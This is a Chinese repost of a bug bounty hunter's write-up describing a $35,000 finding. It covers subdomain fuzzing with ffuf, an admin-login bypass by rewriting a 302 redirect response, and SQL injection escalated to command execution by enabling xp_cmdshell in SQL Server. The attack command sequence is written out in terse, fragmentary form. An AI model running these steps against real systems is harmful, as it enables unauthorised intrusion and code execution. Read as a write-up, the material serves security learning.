本文由漏洞猎人Abdullah Nawaf于2024年3月18日发表在Medium网站,本文记录了Abdullah Nawaf的一次漏洞挖掘过程,而此次漏洞挖掘也成功让他获取到了三万五千美元的漏洞奖金。本文旨在跟大家分享一名专业漏洞猎人的漏洞挖掘心路历程,仅出于经验分享和教育目的撰写。
Abdullah Nawaf是一名专业的全职漏洞奖金猎人,而他也一直活跃在BugCrowd排名前五十的榜单上,其P1级别漏洞排名为11,主要挖掘的是P1和P2级别的漏洞。
接下来,我们一起看看Abdullah Nawaf和Orwa Atyat(另一名安全专家)是如何利用子域名模糊测试以及其他一系列多个安全漏洞实现了远程代码执行,并将漏洞上报后,拿到了三万五千美元的漏洞奖金。
ffuf -w /subdomain_megalist.txt -u 'https://adminFUZZ.Target.com' -c -t 350 -mc all -fs 0
change 302 Moved Temporarily to 200 OK
remove Location: /admin/Login.aspx?logout=y
remove html redirect code
SQLI
Select * from users
远程代码执行RCE
Select * from users
SELECT @@version
SP_CONFIGURE "show advanced options", 1
RECONFIGURE
SP_CONFIGURE "xp_cmdshell", 1
RECONFIGURE
xp_cmdshell ‘whoami’
admin-FUZZ.target.com 例如: admin-stg.target.com
FUZZ-admin.target.com 例如: cert-admin.target.com
adminFUZZ.target.com 例如: admintest.target.com
FUZZadmin.target.com 例如: testadmin.target.com
admin.FUZZ.target.com 例如: admin.dev.target.com
ffuf -w /subdomain_megalist.txt -u 'https://adminFUZZ.Target.com' -c -t 350 -mc all -fs 0
-t means threads , dont make it so high u could miss alot of working subs , aslo its dpends in your network speed
,sinc im using vps 350 find for me
-mc all means macth all respone codes like 200,302,403 and this importent
https://bugcrowd.com/HackerX007 https://github.com/netsecurity-as/subfuz/blob/master/subdomain_megalist.txt https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server https://medium.com/@s12deff/microsoft-sql-server-to-rce-984016b4aaf8 https://medium.com/@HX007/subdomain-fuzzing-worth-35k-bounty-daebcb56d9bc
原文始发于微信公众号(WIN哥学安全):经验分享 | 记一次通过子域模糊测试识别漏洞并获取高额赏金的经历
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论